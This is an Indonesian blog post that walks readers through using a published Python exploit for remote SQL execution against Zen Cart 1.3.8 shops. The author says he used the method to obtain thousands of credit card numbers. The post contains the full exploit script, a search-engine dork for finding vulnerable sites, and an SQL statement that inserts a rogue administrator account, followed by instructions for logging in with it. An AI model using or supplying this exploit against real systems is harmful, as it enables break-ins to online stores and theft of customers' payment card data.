Zen Card

ni w coba share sedikit teknik yg pernah gw pakai n berhasil mndapatkan ribuan CC (credit card) pi gtw msih ampuh ap ga,soalnya w sdar ni bkn jalur gw jd ga prnh gw aplikasikan Lg (hidup elektro)
kwkwkwkw...

langsung ajh :
1. instal phyton (di folder C) klo ga punya cari ajh di google banyak, inget bukan uler pyton lol..
2. copy trus save di notaped dengan nama zc.py (simpan di folder C)

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
global a, b
for param in sys.argv:
if(param == '-'+name): return str(sys.argv[b+1])
b = b + 1
if(need):
print '\n#error', "-"+name, 'parameter required'
exit(1)

if (len(sys.argv) < 2):
print """

Zen Cart 1.3.8 Remote SQL Execution Exploit


| $system> python """+sys.argv[0]+""" -url |
| Param: ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |

"""
exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
cmd = raw_input('masukin@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
print '>> atenks tampan (', cmd, ")"
else:
print '>> fiate Tae (', cmd, ")"

# milw0rm.com [2009-06-23]

2. inurl:main_page webhosting "index php"
3. eksekusi target dengan cara...

[+] buka CMD lalu pergi ke direktori dimana file zen.py berada
[+] ketikkan zen.py -url http://www.situskorban.com/
[+] loading..... [ - ] sql@jah$ exploit [
[+] exploit : INSERT INTO admin VALUES (13, 'atenks', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);

[+] loading...
[+] jika beruntung maka ada tulisan "atenks tampan", jika tidak beruntung,kLo ga beruntung ad tulisan "fiate Tae" cari target yang lain..
[+] bagi anda yang beruntung maka anda tinggal pergi ke admin login
[+] http://www.situskorban.com/admin
[+] masukkan username dan password | user = "admin" | pass = "atenks"
[+] Login Success

coffe-faste 11:59:00 PM Komentar

Related Posts

Zen Card

4/ 5

Oleh coffe-faste